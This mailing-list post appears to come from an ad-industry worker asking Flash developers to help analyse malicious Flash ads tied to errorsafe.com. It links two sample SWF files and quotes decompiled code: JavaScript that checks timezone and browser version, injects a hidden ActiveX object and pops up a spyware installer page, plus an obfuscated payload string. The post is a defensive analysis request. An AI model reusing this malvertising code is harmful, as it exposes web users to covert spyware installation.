Dear List, First off, apologies if this is the wrong forum for this question. Some background -- I'm in the online advertising industry and I've been trying to track down an squash a scam that has been hitting the industry. There is a party out there (errorsafe.com) that is embedding some very nasty code in their flash ads that depending on several factors will popup a new window and try install their spyware using active-x. Here are two sample swf files: http://content.yieldmanager.com/13312/94749/27e558c94df509ebe888fdc0060640e8.swf http://content.yieldmanager.com/17344/138497/6d4ef47cf4071557d6749ad9c2fcf8cc.swf Now I've been decompiling extracting code with various tools to try to gain some insight. So interestingly enough, one of them is a little older, and it's easier to point blame as in the 'constants' the following is defined: constants [...some taken out...] 'http://www.errorsafe.com/pages/scanner/index.php?aid=tiger&lid=swf7&ax=1&ex=1&ed=2', 'http://uk.matchservice.com/reg_swf.php?campaign=tiger', 'easyPP', 'http://uk.matchservice.com/?aid=tiger&lid=swf7&ax=0', 'tz_begin', 'tz_end', 'javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u=\'', '\',dt=new Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a&&(a.indexOf(\'SP2\')!=-1));i=(d.all&&encodeURI()&&!w.Event);if(!(tz>=', '&&tz<=', ')){if(p&&!d.getElementById(\'o\')){d.body.innerHTML+=\'<object id=o height="0" classid="CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6"></object>\';};(i&&p)?o.launchURL(u):w.open(u);};void 0;', 'jscript', '\';p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a&&(a.indexOf(\'SP2\')!=-1));i=(d.all&&encodeURI()&&!w.Event);if(p&&!d.getElementById(\'o\')){d.body.innerHTML+=\'<object id=o height="0" classid="CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6"></object>\';};(i&&p)?o.launchURL(u):w.open(u);void 0;', 'unique:Date', 'Date', 'my_date:Date', 'my_so:SharedObject', '/', 'tiger_swf7300506', 'SharedObject', 'getLocal', 'tm', 'setswfashCookie', 'ClickTAG', 'ClickTARGET', '_blank', 'URL_btn', 'onRelease' The other file seems to have encrypted this informaiton to make it hard to track down: 'setcookie...', '_level0', 'l2', 'c1', 'l24', 'l1', 'l21', 'l22', 'l23', 'l25', 'this', 'l27', 't', 'l26', 'u', 'l31', 'l32', 'l28', '_global', 'i', '_ll2', 'l33', 'l35', ' - ', 'l43', 'l34', 's', '_self', 'l37', 'l36', '??', '????', '????', '???????', '???????', '???????', '?????', '????????????????????', '???????????????????', '?????????????', 'l29', '???????', 'l30', '?????', '???', '?????????????????????????????????????????????????????', '???????????', '?????????????', '?????', '??????', '?ý?ý?ÿ????Ö?ý?¼?Ù??????È?Ù?ý???ý???ÈýÙ?Êý??é????ò??????È?Ù??ÿ?????È?Ù¾????ÖËË???Ê??????ý??Êÿ??Ë?ý???Ë?ÿý????Ë?????Ê???Ûý??Ù????ÎÌÌÏÂ???Ù????Âý?ÙÍÂ??ÙÍÂ??ÙξÈ??Ù???¼àý??ÄÅÈ??ÙÉ??Ê???ð???????ë?????ÄÅËÒÌ×??ĽÄ??ÚÙÉÕÂÂ??ØÙÉÏÅÅ???Ľ?Ê???á??????Þ?å?ľ?¾ÅÅ??Êþ???Ê?????äðéèÇÙÃØ?þ??ÿ?¼??Ù?¼??????Ùø¾Ìø¾¼ÿ?ý????Ùø¾ßèïåàÖÒÞâÑÎÝÑÎÉÏÕÐÝÉÍÍàÏÉÞÍÑÏÉÌÌßÌÐâÓÕâÝÝÒø¾ÚØË?þ??ÿ?ÚÃ?×?????Ê?ý??ÿ?ñîèÄ?Å?ÿý?ÿ?Ä?Å??Ê????Ä?Å×????ÄÌÅ×??×', 'l38', '????????', 'l39', '????????????', 'l40', '?', 'l41', '???????', 'l42', '??????', '?????', 'String', 'prototype', '', 'split', 'length', 'charCodeAt', 'fromCharCode', 'join', 'newMenu', 'ContextMenu', 'hideBuiltInItems', 'menu', 'Date', 'epru2003intl592006', 'b', ' : ', '_ll1', 'ClickTAG', 'http://workhomecenter.com/?aid=istem&lid=intl', 'ClickTARGET', '_blank' So I'm kind of at a loss as to how to figure out what this flash file does. They've clearly masked their code quite well to make it very difficult ot see. I do know a few things: - The file loads an outside html file, which checks the user's IP address, and depending on the geo that IP matches to returns a 1/0 value (or in some cases, an encrypted 'yes/no') as to whether or not to serve a pop - The flash file also checks the timezone of the browser in addition to IP as an added check that the user is outside the US. Any insight? Again, apologies if this is the wrong list to ask and I will greatly appreciate direction if it isn't! -Mike _______________________________________________ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com